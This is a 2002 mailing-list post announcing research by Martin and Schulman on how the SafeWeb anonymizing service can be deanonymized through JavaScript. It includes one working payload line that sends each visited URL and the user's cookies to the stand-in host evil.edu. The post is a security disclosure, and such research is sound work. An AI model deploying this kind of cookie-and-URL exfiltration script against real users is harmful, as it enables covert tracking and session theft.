Deanonymizing SafeWeb Users

From: David Martin (dmat_private)
Date: Mon Feb 11 2002 - 18:13:27 PST

    Although SafeWeb's Web anonymizing service has been shut down since
    December, they claimed it was the "most widely used online privacy service
    in the world".  SafeWeb licensed their technology to PrivaSec, who is
    currently running the technology in a preview program for a planned
    subscription service.  They also licensed it to the CIA.

    Andrew Schulman and I have just finished a technical report detailing
    SafeWeb's catastrophic failures under the simplest of JavaScript attacks by
    Web sites or firewalls (e.g., by redirecting to a page containing the
    exploit).  An example (really one long line):

    self['window']['top'].frames[0]['cookie_munch'] = Function('i=new
    Image(1,1);i.s'+'rc="https://evil.edu/"+top.frames[0].document.forms["fugulo
    cation"].URL_text.value+(new Date()).getTime()+document.cookie;');

    This is spyware.  Any Web page containing this JavaScript makes the SafeWeb
    browser silently report every URL visited to the attacker at evil.edu, along
    with a copy of all of the persistent cookies previously established through
    SafeWeb.  It works regardless of the user's security settings (recommended
    vs paranoid mode, etc.)  This attack is the only one we describe that
    depends on the browser: it works in Netscape 6.x and probably previous
    versions, but not IE.  We have an attack that does basically the same thing
    and works in IE too, but it's a bit longer.  Since our attacks are just
    JavaScript, they probably don't depend on the OS of the victim.

    Basically, using the SafeWeb privacy service helps keep user identities out
    of routinely gathered log files, but it creates serious new risks for anyone
    an adversary might bother to actually target.  You have to wonder whether
    this is a good tradeoff.  After all, in the absence of serious bugs, Web
    browsers generally prevent Web sites from silently depositing spyware or
    snarfing all of the user's cookies.  One thing is clear: most users in the
    intended market for this system had no idea that this system brought any
    risks with it.

    For the full report (23 pages, PDF):
    http://www.cs.bu.edu/techreports/pdf/2002-003-deanonymizing-safeweb.pdf

    We've been in touch with SafeWeb since October, and with PrivaSec for about
    a month now.  Some related problems in SafeWeb involving JavaScript spilling
    IP addresses have been noted here (by Alexander Yezhov) and in
    alt.privacy.anon-server (by Paul Rubin).  Our paper adds spyware, cookie
    snarfing, and the essential equivalence between SafeWeb's "paranoid" and
    "recommended" modes of operation to the list of problems with SafeWeb's
    technology.

    David Martin http://www.cs.bu.edu/~dm
    Andrew Schulman http://www.undoc.com/